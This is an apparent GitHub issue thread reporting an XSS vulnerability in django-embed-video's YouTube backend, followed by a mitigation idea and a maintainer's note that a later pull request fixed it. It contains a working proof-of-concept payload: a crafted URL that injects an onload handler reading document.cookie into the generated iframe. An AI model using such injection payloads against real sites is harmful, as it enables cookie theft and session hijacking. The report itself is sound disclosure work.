### ISSUE TITLE
XSS possible in YoutubeBackend with user-provided URL

### ISSUE THREAD

**Issue by Remiz** [jazzband/django-embed-video#182]
Hi,

I think I've noticed a possible XSS using this package when users are allowed to provide urls.
Here is the code I've used reproduce the issue:
```
import embed_video

url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))
```

And here is the result of the embedded code:
```
<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>
```

It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.

**Comment by Remiz** [comment]
I think I've been able to mitigate the issue by simply removing every space character from the provided url.
I'm not sure if the responsibility of sanitizing the video URLs should be on this package or not, so I'll leave this bug report open, but if you feel it should be the package user's responsibility, feel free to close it.

**Comment by aleksihakli** [comment]
Fixed by #187
